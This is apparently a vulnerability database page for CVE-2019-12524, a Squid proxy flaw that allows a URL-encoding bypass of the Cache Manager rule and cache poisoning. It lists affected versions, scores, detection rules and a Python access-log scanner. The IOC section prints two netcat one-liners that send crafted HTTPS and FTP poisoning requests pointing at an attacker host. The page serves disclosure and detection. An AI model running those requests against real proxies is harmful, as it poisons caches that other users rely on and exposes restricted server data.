CVE-2019-12524
published 2020-04-15


Priority: P260 · critical · CVSS 3.1 score 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EPSS: 4.15% (89.6th percentile)
An issue was discovered in Squid through 4.7. When handling requests from users, Squid checks its rules to see if the request should be denied. Squid by default comes with rules to block access to the Cache Manager, which serves detailed server information meant for the maintainer. This rule is implemented via url_regex. The handler for url_regex rules URL decodes an incoming request. This allows an attacker to encode their URL to bypass the url_regex check, and gain access to the blocked resource.

Affected (10 ranges)

Vendor      | Product      | Version range                | Fixed in
canonical   | ubuntu_linux |                              |
canonical   | ubuntu_linux |                              |
debian      | debian_linux |                              |
debian      | debian_linux |                              |
debian      | squid        | < squid 4.8-1 (bookworm)     | squid 4.8-1 (bookworm)
squid-cache | squid        | <= 4.7                       |
squid       | squid        | >= 0, < 4.8-1                | 4.8-1
squid       | squid        | >= 0, < 4.8-1                | 4.8-1
squid       | squid        | >= 0, < 4.8-1                | 4.8-1
squid       | squid        | >= 0, < 4.8-1                | 4.8-1

Detection & IOCs (extracted from sources)

port: 3128
command: echo -e "GET https://hackerone.com%2f%[email protected]:8080/html/alert.html HTTP/1.1\r\n\r\n" |nc 3128
command: echo -e "GET ftp://hackerone.com/[email protected]:8080/payload HTTP/1.1\r\n\r\n" |nc 3128
url: http://www.squid-cache.org/Versions/v4/changesets/SQUID-2019_4.patch
url: http://www.squid-cache.org/Advisories/SQUID-2019_4.txt
  • Detect URL-encoded Cache Manager access bypass: look for percent-encoded sequences (%2f, %3f, etc.) in requests targeting Squid's Cache Manager path (cachemgr.cgi or /squid-internal-mgr/) that, when decoded, resolve to the blocked resource.
  • Detect HTTPS cache poisoning attempts: look for requests where the URL contains percent-encoded slashes and question marks in the userinfo/host portion (e.g., host%2f%3f@attacker-ip:port/path) sent to Squid proxy port 3128.
  • Detect FTP cache poisoning attempts: look for FTP requests with an @ symbol in the URL path (e.g., ftp://target.com/?@attacker-ip:port/payload) sent through Squid proxy, which abuses userInfo URL decoding to poison the cache.
  • Monitor Squid access logs for requests containing URL-encoded special characters (%2F, %3F, %40) in the host/userinfo portion of HTTPS or FTP URLs, which indicate exploitation of the url_regex ACL bypass or cache poisoning.
  • Flag cache HIT responses (X-Cache: HIT) served for requests whose URL contains an @ symbol with an IP address in the path, as this indicates a poisoned cache entry is being served to a victim.
  • The vulnerability exists in Squid through version 4.7 for HTTPS cache poisoning and through 4.9 for FTP cache poisoning; flag any Squid instance reporting these versions in its Server header (e.g., Server: squid/4.7, squid/4.9).
  • HTTPS cache poisoning (CVE-2019-12524) only applies when Squid is configured with ssl-bump and dynamic certificate generation (generate-host-certificates=on). Default Squid configurations without SSL bump are not vulnerable to the HTTPS variant.
  • The fix for CVE-2019-12524 only addressed the HTTPS aspect of cache poisoning; FTP cache poisoning remained exploitable until Squid 4.10, so patching to 4.8 alone does not fully remediate the FTP variant.
  • The url_regex ACL bypass affects the Cache Manager access control rule specifically; other ACL types are not affected by this URL-decoding issue.
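The first and fourth detection notes above (decode the URL before matching it against the Cache Manager pattern, and flag encoded delimiters in the host/userinfo part of HTTPS or FTP URLs) can be run over Squid access logs. The following is an added example written for this page, not code from the Squid project or the advisory; it assumes Squid's native access log format (URL is the 7th whitespace-separated field) and uses constructed sample log lines with documentation addresses.

```python
import re
from urllib.parse import unquote, urlsplit

# Blocked resource the default Squid rule protects (cachemgr.cgi, /squid-internal-mgr/).
CACHEMGR_RE = re.compile(r"(?:cachemgr\.cgi|/squid-internal-mgr/)", re.IGNORECASE)
# Percent-encoded '/', '?' and '@' in the authority part, as listed in the detection notes.
ENCODED_DELIM_RE = re.compile(r"%(?:2f|3f|40)", re.IGNORECASE)


def fully_decode(url: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so double encoding is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url


def classify(url: str) -> list[str]:
    """Return the detection labels that apply to a single request URL (empty list if none)."""
    findings = []
    # Rule 1: the raw URL escapes the url_regex pattern but the decoded URL hits it,
    # i.e. the request reached the Cache Manager only because of encoding.
    decoded = fully_decode(url)
    if CACHEMGR_RE.search(decoded) and not CACHEMGR_RE.search(url):
        findings.append("cachemgr-bypass")
    # Rule 2: encoded delimiters before the first '/', i.e. in the userinfo/host portion.
    parts = urlsplit(url)
    if parts.scheme.lower() in ("https", "ftp") and ENCODED_DELIM_RE.search(parts.netloc):
        findings.append("encoded-authority")
    return findings


def scan_log(lines: list[str]) -> list[tuple[str, str, list[str]]]:
    """Return (client_ip, url, findings) for every native-format log line that trips a rule."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue  # not a native-format access log line
        findings = classify(fields[6])
        if findings:
            hits.append((fields[2], fields[6], findings))
    return hits


# Constructed sample access log (assumption: native format; 192.0.2.0/24 is a documentation range).
SAMPLE_LOG = """\
1690000000.123   5 10.0.0.5 TCP_DENIED/403 0 GET http://proxy.example/squid-internal-mgr/info - HIER_NONE/- text/html
1690000001.456  12 10.0.0.5 TCP_MISS/200 3120 GET http://proxy.example/squid-internal-mgr%2Finfo - HIER_DIRECT/127.0.0.1 text/html
1690000002.789  30 10.0.0.9 TCP_MISS/200 812 GET https://example.com%2f%3f@192.0.2.10:8080/x - HIER_DIRECT/192.0.2.10 text/html
1690000003.001   8 10.0.0.7 TCP_HIT/200 4410 GET http://www.example.org/index.html - HIER_NONE/- text/html
""".splitlines()
```

The first sample line is a normally denied Cache Manager request and is deliberately not flagged; only the encoded variant and the encoded-authority HTTPS request produce findings.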

CVSS provenance

Source        | Version | Score | Severity | Vector
nvd           | v3.1    | 9.8   | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd           | v2.0    | 7.5   | HIGH     | AV:N/AC:L/Au:N/C:P/I:P/A:P
osv           |         | 9.8   | CRITICAL |
vendor_debian |         | 9.8   | CRITICAL |
vendor_redhat |         | 9.8   | CRITICAL |
vendor_ubuntu |         | 7.5   | HIGH     |